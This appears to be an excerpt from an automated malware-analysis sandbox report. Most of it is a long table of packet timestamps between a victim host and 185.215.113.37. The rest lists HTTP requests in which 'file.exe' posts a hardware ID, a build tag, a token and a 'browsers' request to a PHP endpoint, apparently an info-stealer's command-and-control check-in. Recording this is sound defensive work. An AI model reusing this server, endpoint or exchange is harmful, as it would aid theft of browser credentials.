Sep 27, 2024 01:28:25.320877075 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.320878029 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320890903 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320902109 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320905924 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.320913076 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320924044 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320934057 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.320935011 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320946932 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320956945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320969105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.320977926 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.320979118 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.321027040 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406574011 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406594992 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406605959 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406618118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406632900 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406630039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406649113 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406672955 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406691074 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406694889 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406702042 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406713009 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406734943 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406747103 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406754017 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406759024 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406769991 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406785965 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406805992 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406821012 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406832933 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406842947 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406855106 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406872988 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406893969 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.406964064 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406975031 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406985044 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.406996012 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407006025 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407015085 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407016993 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407031059 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407033920 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407052040 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407111883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407119036 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407130957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407140970 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407151937 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407156944 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407175064 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407176971 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.407201052 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.407243967 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.442140102 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.442152977 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.442163944 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.442177057 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.442264080 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.442264080 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.442651033 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.442843914 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.478388071 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.483814955 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696691036 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696798086 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696799994 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696809053 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696820021 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696832895 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696837902 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696865082 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696871042 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696878910 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696883917 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696907997 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696913004 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696914911 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696926117 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.696940899 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.696985960 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697016954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697033882 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697045088 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697058916 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697068930 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697072983 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697082996 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697099924 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697114944 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697457075 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697474957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697487116 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697504997 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697515011 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697525978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697532892 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697532892 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697536945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697550058 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697561026 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697572947 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697577953 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697614908 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697633982 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697644949 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697655916 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697666883 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697678089 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697679043 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697689056 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697700024 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697714090 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697722912 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697726965 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697730064 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697736979 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697771072 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697912931 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697923899 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697933912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697943926 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697954893 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697957993 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697966099 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697974920 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697985888 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.697985888 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.697995901 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698007107 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698012114 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698018074 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698029995 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698041916 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698060036 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698064089 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698074102 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698075056 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698085070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698095083 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698106050 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698112965 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698121071 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698122978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698133945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698143959 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698143959 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698164940 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698167086 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698179960 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698184967 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698189020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698204041 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698213100 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698257923 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698275089 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698286057 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698296070 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698307037 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698312998 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698319912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698340893 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698367119 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698542118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698553085 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698570967 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698582888 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698595047 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698595047 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698606014 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698623896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698647976 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698707104 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698719978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698739052 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698750019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698760986 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698766947 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698771954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698781013 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698782921 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698795080 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698801041 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698807001 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:25.698824883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:25.698853016 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:26.587692022 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:26.587723017 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:26.592581034 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:26.592628002 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.475850105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.475931883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.531598091 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.536405087 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.756454945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.756506920 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.756513119 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.756516933 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.756545067 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.756567955 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.759618998 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.764374971 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986325979 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986341000 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986354113 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986418009 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986454964 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986464024 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986466885 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986486912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986493111 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986496925 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986507893 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986514091 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986524105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986535072 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986535072 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986546040 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986568928 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986572027 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:27.986587048 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:27.986612082 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:28.003597975 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:28.008555889 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:28.715806961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:28.715882063 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:28.760339975 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:28.765181065 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:29.053236961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:29.053369999 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:29.054594040 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:29.059355974 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:29.827187061 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:29.827322960 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:32.773616076 CEST	49706	80	192.168.2.9	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	185.215.113.37	80	7660	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 01:28:12.652839899 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 01:28:13.356488943 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:13.360033035 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 39 35 30 32 45 44 39 31 44 45 33 37 31 32 36 35 39 37 38 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="hwid"7C9502ED91DE3712659782------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build"save------HCGCBFHCFCFBFIEBGHJE--
Sep 27, 2024 01:28:13.594053030 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:13 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 54 4a 6d 4d 54 4d 77 59 6d 59 30 5a 57 52 6a 59 57 45 35 4d 47 59 33 5a 44 6b 34 4d 6a 52 6b 59 32 51 77 59 6d 46 6b 5a 57 49 31 5a 57 59 33 4e 7a 52 69 4f 44 52 6d 5a 6d 59 30 4d 47 49 35 4f 54 59 35 59 6a 4a 6d 5a 57 4d 31 59 7a 55 77 4e 32 4d 35 5a 57 56 6a 5a 6a 68 6b 59 7a 59 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NTJmMTMwYmY0ZWRjYWE5MGY3ZDk4MjRkY2QwYmFkZWI1ZWY3NzRiODRmZmY0MGI5OTY5YjJmZWM1YzUwN2M5ZWVjZjhkYzY2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 27, 2024 01:28:13.595463037 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 2d 2d 0d 0a Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="message"browsers------FHJKKECFIECAKECAFBGC--
Sep 27, 2024 01:28:13.816384077 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:13 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: 